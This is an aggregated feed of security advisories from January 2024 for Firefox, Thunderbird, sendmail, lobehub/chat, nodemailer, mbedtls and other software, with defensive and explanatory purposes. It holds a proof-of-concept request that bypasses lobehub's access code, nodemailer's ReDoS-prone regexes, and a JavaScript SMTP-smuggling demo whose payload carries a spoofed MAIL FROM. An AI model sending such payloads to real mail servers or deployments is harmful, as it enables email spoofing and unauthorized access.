30.01.2024 02:00:00redhat[RHSA-2024:0608] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0608
30.01.2024 02:00:00redhat[RHSA-2024:0609] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0609
30.01.2024 02:00:00redhat[RHSA-2024:0557] tigervnc security update (important)Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0557
30.01.2024 02:00:00redhat[RHSA-2024:0602] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.7.0.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0602
30.01.2024 02:00:00redhat[RHSA-2024:0603] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.7.0 ESR.Security Fix(es):* Mozilla: Out of bounds write in ANGLE (CVE-2024-0741)* Mozilla: Failure to update user input timestamp (CVE-2024-0742)* Mozilla: Crash when listing printers on Linux (CVE-2024-0746)* Mozilla: Bypass of Content Security Policy when directive unsafe-inline was set (CVE-2024-0747)* Mozilla: Phishing site popup could show local origin in address bar (CVE-2024-0749)* Mozilla: Potential permissions request bypass via clickjacking (CVE-2024-0750)* Mozilla: Privilege escalation through devtools (CVE-2024-0751)* Mozilla: HSTS policy on subdomain could bypass policy of upper domain (CVE-2024-0753)* Mozilla: Memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7 (CVE-2024-0755)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0603
01.02.2024 00:42:56npm[NPM:GHSA-9H6G-PR28-7CQP] nodemailer ReDoS when trying to send a specially crafted email (moderate)### Summary A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, blocking the event loop. Another flaw was found when nodemailer tries to parse attachments with an embedded file, also blocking the event loop. ### Details Regex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/ Path: compile -> getAttachments -> _processDataUrl Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/ Path: _convertDataImages ### PoC https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698 ### Impact ReDoS blocks the event loop; a specially crafted malicious email can trigger this problem.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9H6G-PR28-7CQP
31.01.2024 23:25:31slackware[SSA:2024-031-01] sendmail (medium)New sendmail packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```extra/sendmail/sendmail-8.18.1-i586-1_slack15.0.txz: Upgraded. sendmail through 8.17.2 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because sendmail supports <LF>.<CR><LF> but some other popular e-mail servers do not. This is resolved in 8.18 and later versions with 'o' in srv_features. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-51765 (* Security fix *) extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txz: Upgraded.``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/sendmail/sendmail-8.18.1-i586-1_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txz Updated packages for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/sendmail/sendmail-8.18.1-x86_64-1_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/sendmail/sendmail-cf-8.18.1-noarch-1_slack15.0.txz Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/sendmail/sendmail-8.18.1-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/sendmail/sendmail-cf-8.18.1-noarch-1.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/sendmail/sendmail-8.18.1-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/sendmail/sendmail-cf-8.18.1-noarch-1.txz **MD5 signatures** Slackware 15.0 packages: c3476bc08a89961b1bd85aa41fe0399e sendmail-8.18.1-i586-1_slack15.0.txz da65abecc807b6af76f1f5f23545c426 sendmail-cf-8.18.1-noarch-1_slack15.0.txz Slackware x86_64 15.0 packages: bd5bb1d3ec4e26829eb59361ed1e46cb sendmail-8.18.1-x86_64-1_slack15.0.txz 716fb38618dc85bf5704fa33c1086d2b sendmail-cf-8.18.1-noarch-1_slack15.0.txz Slackware -current packages: e7b502527dfbc9050a4c78cdc266e408 sendmail-8.18.1-i586-1.txz 603bcf2ecc861ea275f002636c259c4c sendmail-cf-8.18.1-noarch-1.txz Slackware x86_64 -current packages: 38c56928fa6feb1709c84405e60b6f72 sendmail-8.18.1-x86_64-1.txz 5fc24831c13249281202717e17e70bae sendmail-cf-8.18.1-noarch-1.txz **Installation instructions** Upgrade the packages as root: `# upgradepkg sendmail-*.txz` Then, restart sendmail: `# sh /etc/rc.d/rc.sendmail restart`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-031-01
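The Slackware ChangeLog above spells out the SMTP smuggling mechanism behind this sendmail fix and the Exim and Postfix entries elsewhere on this page: the DATA phase is supposed to end at `<CR><LF>.<CR><LF>`, and a receiver that additionally accepts `<LF>.<CR><LF>` ends the message earlier than the relay in front of it, so the rest of the payload is read as new SMTP commands and a second message with a spoofed MAIL FROM. The block below is an added example, not sendmail, Exim or Postfix code: a strict and a lenient end-of-data splitter run over one constructed DATA payload, showing that the strict one sees a single message and the lenient one yields a smuggled envelope.

```javascript
// Added example, not sendmail, Exim or Postfix code: the end-of-DATA check
// that SMTP smuggling abuses. RFC 5321 ends the DATA phase at <CR><LF>.<CR><LF>.
// A receiver that also accepts the bare-LF variant <LF>.<CR><LF> ends the
// message early, so the bytes after it are read as fresh SMTP commands.
// The message below is constructed for the demo.
const STRICT_EOD = '\r\n.\r\n';
const LENIENT_EOD_RE = /(?:\r\n|\n)\.\r\n/; // also stops at <LF>.<CR><LF>

// RFC 5321 4.5.2: a leading '.' on a body line was doubled by the sender.
function dotUnstuff(message) {
  return message.split('\r\n').map((l) => (l.startsWith('.') ? l.slice(1) : l)).join('\r\n');
}

// `stream` holds everything received after the 354 reply. A CRLF is prepended
// so a message consisting only of ".<CR><LF>" terminates correctly.
function splitDataStrict(stream) {
  const buf = '\r\n' + stream;
  const i = buf.indexOf(STRICT_EOD);
  if (i === -1) return null; // terminator not seen yet, keep reading
  return { message: dotUnstuff(buf.slice(2, i)), rest: buf.slice(i + STRICT_EOD.length) };
}

function splitDataLenient(stream) {
  const buf = '\r\n' + stream;
  const m = LENIENT_EOD_RE.exec(buf);
  if (!m) return null;
  return { message: dotUnstuff(buf.slice(2, m.index)), rest: buf.slice(m.index + m[0].length) };
}

// One DATA payload from a sender allowed to use MAIL FROM:<alice@...>. The
// <LF>.<CR><LF> in the middle is the smuggling point; what follows is a second
// envelope plus message that a lenient receiver accepts as if it had been
// sent by ceo@example.com, with SPF already "passed" for the outer envelope.
const SMUGGLED_DATA =
  ['From: alice@example.com', 'To: bob@example.net', 'Subject: legit', '', 'hello'].join('\r\n') +
  '\n.\r\n' +
  ['MAIL FROM:<ceo@example.com>', 'RCPT TO:<bob@example.net>', 'DATA',
   'From: ceo@example.com', 'To: bob@example.net', 'Subject: urgent transfer', '', 'pay now', '.', ''].join('\r\n');

function demo() {
  const strict = splitDataStrict(SMUGGLED_DATA);
  const lenient = splitDataLenient(SMUGGLED_DATA);
  return {
    strictRest: strict.rest,                             // '' : one message, nothing left
    strictBodyHasEnvelope: strict.message.includes('MAIL FROM:<ceo@example.com>'),
    lenientRestFirstLine: lenient.rest.split('\r\n')[0], // 'MAIL FROM:<ceo@example.com>'
  };
}
```

The strict splitter treats the forged `MAIL FROM` line as body text of the one message the relay actually accepted; the lenient one hands `MAIL FROM:<ceo@example.com>` back as the next command, which is the bypass of the SPF check that the advisory describes. Which terminators a server accepts is a configuration matter (the ChangeLog points to `srv_features` for sendmail); the example only shows why the two sides must agree.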
31.01.2024 22:17:00ubuntu[USN-6619-1] runC vulnerability (high)runC could be made to expose sensitive information or allow escape from containers.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6619-1
31.01.2024 22:25:38npm[NPM:GHSA-PF55-FJ96-XF37] @lobehub/chat vulnerable to unauthorized access to plugins (moderate)### Description: When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without the password). ### Proof-of-Concept: Let's suppose that the application has been deployed with the following command: ```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat``` Because `ACCESS_CODE` is set, access to the chat is possible only after entering the password. However, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. Example HTTP request: ```POST /api/plugin/gateway HTTP/1.1 Host: localhost:3210 Content-Length: 1276 {"apiName":"checkWeatherUsingGET","arguments":"{\n \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}``` HTTP response: ```HTTP/1.1 200 OK [...] {"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}``` ### Remediation: Verify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route. ### Impact: Unauthorized access to plugins.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PF55-FJ96-XF37
31.01.2024 15:34:03ubuntu[USN-6591-2] Postfix update (medium)Postfix could allow bypass of email authentication if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6591-2
31.01.2024 20:07:41maven[MAVEN:GHSA-P6RP-MX85-M459] Spring Cloud Contract vulnerable to local information disclosure (low)In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P6RP-MX85-M459
31.01.2024 10:15:42 | alpinelinux | [ALPINE:CVE-2024-23170] mbedtls vulnerability
[From CVE-2024-23170] An issue was discovered in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2. There was a timing side channel in RSA private operations. This side channel could be sufficient for a local attacker to recover the plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23170

31.01.2024 10:15:42 | alpinelinux | [ALPINE:CVE-2024-23775] mbedtls vulnerability
[From CVE-2024-23775] Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23775

31.01.2024 10:07:21 | curl | [CURL-CVE-2024-0853] OCSP verification bypass with TLS session reuse (low)
curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to the same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.
https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-0853

31.01.2024 02:00:00 | cisa | [CISA-2024:0131] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0131

31.01.2024 02:00:00 | gentoo | [GLSA-202401-32] libaom: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in libaom, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-32

31.01.2024 02:00:00 | gentoo | [GLSA-202401-30] X.Org X Server, XWayland: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in the Xorg Server and XWayland, the worst of which can result in privilege escalation or remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-30

31.01.2024 02:00:00 | gentoo | [GLSA-202401-31] containerd: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been found in containerd, the worst of which could result in privilege escalation.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-31

31.01.2024 02:00:00 | gentoo | [GLSA-202401-33] WebKitGTK+: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-33

31.01.2024 02:00:00 | gentoo | [GLSA-202401-34] Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities (high)
Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-34

31.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0557] tigervnc security update (important)
[1.13.1-3.6]
- Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice Resolves: RHEL-20389
- Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent Resolves: RHEL-20383
- Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access Resolves: RHEL-20533
- Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer Resolves: RHEL-21213
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0557

31.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0602] thunderbird security update (important)
[115.7.0-1.0.1]
- Update to 115.7.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0602

31.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0608] firefox security update (important)
[115.7.0.1.0.1]
- Update to 115.7.0 build 1
[115.6.0-1.0.1]
- Update to 115.6.0 build1
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.5.0-1.0.1]
- Update to 115.5.0 build1
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.4.0-1.0.1]
- Update to 115.4.0 build1
- Add fix for CVE-2023-44488
- Set homepage from os-release HOME_URL
[115.3.1-1.0.1]
- Update to 115.3.1
[102.15.1-1.0.1]
- Update to 102.15.1 build2
[102.15.0-1.0.1]
- Update to 102.15.0 build2
[102.14.0-1.0.1]
- Updated homepages to use https [Orabug: 34648274]
- Removed Upstream references
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[102.14.0-1]
- Update to 102.14.0 build1
[102.13.0-2]
- Update to 102.13.0 build2
[102.13.0-1]
- Update to 102.13.0 build1
[102.12.0-1]
- Update to 102.12.0 build1
[102.11.0-2]
- Do not import cert to certdb on override exception: rhbz#2118991 mzbz@1833330
[102.11.0-2]
- Update to 102.11.0 build2
[102.11.0-1]
- Update to 102.11.0 build1
[102.10.0-1]
- Update to 102.10.0 build1
[102.9.0-4]
- Update to 102.9.0 build2
[102.9.0-2]
- removed disable-openh264-download
[102.9.0-1]
- Update to 102.9.0 build1
[102.8.0-2]
- Update to 102.8.0 build2
[102.8.0-1]
- Update to 102.8.0 build1
[102.7.0-1]
- Update to 102.7.0 build1
[102.6.0-2]
- Add firefox-x11 subpackage to allow explicit run of firefox under x11 on RHEL9
[102.6.0-1]
- Update to 102.6.0 build1
[102.5.0-2]
- Added libwebrtc screencast patch for newer features
[102.5.0-1]
- Update to 102.5.0 build1
[102.4.0-1]
- Update to 102.4.0 build1
[102.3.0-7]
- Fix for expat CVE-2022-40674 and non functional webrtc
[102.3.0-6]
- Update to 102.3.0 build1
[91.12.0-1]
- Update to 91.12.0 build1
[91.11.0-2]
- Update to 91.11.0 build2
[91.11.0-1]
- Update to 91.11.0 build1
[91.10.0-1]
- Update to 91.10.0 build1
[91.9.1-1]
- Update to 91.9.1 build1
[91.9.0-1]
- Update to 91.9.0
[91.8.0-1]
- Update to 91.8.0
[91.7.0-3]
- Update to 91.7.0 build3
[91.7.0-2]
- Added expat backports of CVE-2022-25235, CVE-2022-25236 and CVE-2022-25315
[91.7.0-1]
- Update to 91.7.0 build2
[91.6.0-2]
- Install langpacks to the browser/extensions to make them available in UI: rhbz#2030190
[91.6.0-1]
- Update to 91.6.0 build1
[91.5.0-2]
- Use default update channel to fix non working enterprise policies: rhbz#2044667
[91.5.0-1]
- Update to 91.5.0 build1
[91.4.0-2]
- Added fix for failing addons signatures.
[91.4.0-1]
- Update to 91.4.0 build1
[91.3.0-1]
- Update to 91.3.0 build1
[91.2.0-5]
- Fixed crashes when FIPS is enabled.
[91.2.0-4]
- Disable webrender on the s390x due to wrong colors: rhbz#2009503
[91.2.0-3]
- Update to 91.2.0 build1
[91.1.0-1]
- Update to 91.1.0 build1
* Tue Aug 17 2021 Jan Horak <jhorak@redhat.com>
- Update to 91.0.1 build1
[91.0-1]
- Update to 91.0 ESR
[91.0-1]
- Update to 91.0b8
[78.12.0-2]
- Rebuild to pickup older nss
[78.12.0-1]
- Update to 78.12.0 build1
[78.11.0-3]
- Update to 78.11.0 build2 (release)
[78.11.0-2]
- Fix rhel_minor_version for dist .el8_4 and .el8
[78.11.0-1]
- Update to 78.11.0 build1
[78.10.0-1]
- Update to 78.10.0
[78.9.0-1]
- Update to 78.9.0 build1
[78.8.0-1]
- Update to 78.8.0 build2
[78.7.1-1]
- Update to 78.7.1
[78.7.0-3]
- Fixing install prefix for the homepage
[78.7.0-2]
- Update to 78.7.0 build2
[78.7.0-1]
- Update to 78.7.0 build1
[78.6.1-1]
- Update to 78.6.1 build1
[78.6.0-1]
- Update to 78.6.0 build1
[78.5.0-1]
- Update to 78.5.0 build1
* Tue Nov 10 2020 erack@redhat.com - 78.4.1-1
- Update to 78.4.1
[78.4.0-3]
- Fixing flatpak build, fixing firefox.sh.in to not disable langpacks loading
[78.4.0-2]
- Enable addon sideloading
[78.4.0-1]
- Update to 78.4.0 build2
* Fri Sep 18 2020 Jan Horak <jhorak@redhat.com>
- Update to 78.3.0 build1
[78.2.0-3]
- Update to 78.2.0 build1
* Fri Jul 24 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.11.0 build1
* Fri Jun 26 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.10.0 build1
* Fri May 29 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.9.0 build1
- Added patch for pipewire 0.3
* Mon May 11 2020 Jan Horak <jhorak@redhat.com>
- Added s390x specific patches
* Wed Apr 29 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.8.0 build1
[68.7.0-3]
- Added fix for rhbz#1821418
[68.7.0-2]
- Update to 68.7.0 build3
[68.6.1-1]
- Update to 68.6.1 ESR
* Wed Mar 04 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.6.0 build1
[68.5.0-3]
- Added fix for rhbz#1805667
- Enabled mzbz@1170092 - Firefox prefs at /etc
* Fri Feb 07 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.5.0 build2
* Wed Feb 05 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.5.0 build1
* Wed Jan 08 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.4.1esr build1
* Fri Jan 03 2020 Jan Horak <jhorak@redhat.com>
- Update to 68.4.0esr build1
* Wed Dec 18 2019 Jan Horak <jhorak@redhat.com>
- Fix for wrong intl.accept_lang when using non en-us langpack
[68.3.0-1]
- Update to 68.3.0 ESR
[68.2.0-4]
- Added patch for TLS 1.3 support.
[68.2.0-3]
- Rebuild
[68.2.0-2]
- Rebuild
[68.2.0-1]
- Update to 68.2.0 ESR
[68.1.0-6]
- Enable system nss on RHEL6
[68.1.0-2]
- Enable building langpacks
[68.1.0-1]
- Update to 68.1.0 ESR
[68.0.1-4]
- Enable system nss
[68.0.1-3]
- Enable official branding
[68.0.1-2]
- Enabled PipeWire on RHEL8
[68.0.1-1]
- Updated to 68.0.1 ESR
[68.0-0.11]
- Update to 68.0 ESR
[68.0-0.10]
- Updated to 68.0 alpha 13
- Enabled second arches
[68.0-0.1]
- Updated to 68.0 alpha
[60.6.0-3]
- Added Google API keys (mozbz#1531176)
[60.6.0-2]
- Update to 60.6.0 ESR (Build 2)
[60.6.0-1]
- Update to 60.6.0 ESR (Build 1)
[60.5.1-1]
- Update to 60.5.1 ESR
[60.5.0-3]
- Added fix for rhbz#1672424 - Firefox crashes on NFS drives.
[60.5.0-2]
- Updated to 60.5.0 ESR build2
[60.5.0-1]
- Updated to 60.5.0 ESR build1
[60.4.0-3]
- Fixing fontconfig warnings (rhbz#1601475)
[60.4.0-2]
- Added pipewire patch from Tomas Popela (rhbz#1664270)
[60.4.0-1]
- Update to 60.4.0 ESR
[60.3.0-2]
- Added firefox-gnome-shell-extension
[60.3.0-1]
- Update to 60.3.0 ESR
[60.2.2-2]
- Added patch for rhbz#1633932
[60.2.2-1]
- Update to 60.2.2 ESR
[60.2.1-1]
- Update to 60.2.1 ESR
[60.2.0-1]
- Update to 60.2.0 ESR
[60.1.0-9]
- Do not set user agent (rhbz#1608065)
- GTK dialogs are localized now (rhbz#1619373)
- JNLP association works again (rhbz#1607457)
[60.1.0-8]
- Fixed homepage and bookmarks (rhbz#1606778)
- Fixed missing file associations in RHEL6 (rhbz#1613565)
[60.1.0-7]
- Run at-spi-bus if not running already (for the bundled gtk3)
[60.1.0-6]
- Fix for missing schemes for bundled gtk3
[60.1.0-5]
- Added mesa-libEGL dependency to gtk3/rhel6
[60.1.0-4]
- Disabled jemalloc on all second arches
[60.1.0-3]
- Updated to 60.1.0 ESR build2
[60.1.0-2]
- Disabled jemalloc on second arches
[60.1.0-1]
- Updated to 60.1.0 ESR
[60.0-12]
- Fixing bundled libffi issues
- Readded some requirements
[60.0-10]
- Added fix for mozilla BZ#1436242 - IPC crashes.
[60.0-9]
- Bundling libffi for the sec-arches
- Added openssl-devel for the Python
- Fixing bundled gtk3
[60.0-8]
- Added fix for mozilla BZ#1458492
[60.0-7]
- Added patch from rhbz#1498561 to fix ppc64(le) crashes.
[60.0-6]
- Disabled jemalloc on second arches
[60.0-4]
- Update to 60.0 ESR
[52.7.0-1]
- Update to 52.7.0 ESR
[52.6.0-2]
- Build Firefox for desktop arches only (x86_64 and ppc64le)
[52.6.0-1]
- Update to 52.6.0 ESR
[52.5.0-1]
- Update to 52.5.0 ESR
[52.4.0-1]
- Update to 52.4.0 ESR
[52.3.0-3]
- Update to 52.3.0 ESR (b2)
- Require correct nss version
[52.2.0-1]
- Update to 52.2.0 ESR
[52.1.2-1]
- Update to 52.1.2 ESR
[52.0-7]
- Added fix for accept language (rhbz#1454322)
[52.0-6]
- Removing patch required for older NSS from RHEL 7.3
- Added patch for rhbz#1414564
[52.0-5]
- Added fix for mozbz#1348168/CVE-2017-5428
[52.0-4]
- Update to 52.0 ESR (b4)
[52.0-3]
- Added fix for rhbz#1423012 - ppc64 gfx crashes
[52.0-2]
- Enable system nss
[52.0-1]
- Update to 52.0ESR (B1)
- Build RHEL7 package for Gtk3
[52.0-0.13]
- Added fix for rhbz#1414535
[52.0-0.12]
- Update to 52.0b8
[52.0-0.11]
- Readded addons patch
[52.0-0.10]
- Update to 52.0b3
[52.0-0.9]
- Update to 52.0b2
[52.0-0.8]
- Update to 52.0b1
[52.0-0.5]
- Firefox Aurora 52 testing build
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0608

31.01.2024 02:00:00 | redhat | [RHSA-2024:0627] gnutls security update (moderate)
The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.
Security Fix(es):
* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0627

31.01.2024 02:00:00 | redhat | [RHSA-2024:0628] libssh security update (moderate)
libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.
Security Fix(es):
* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0628

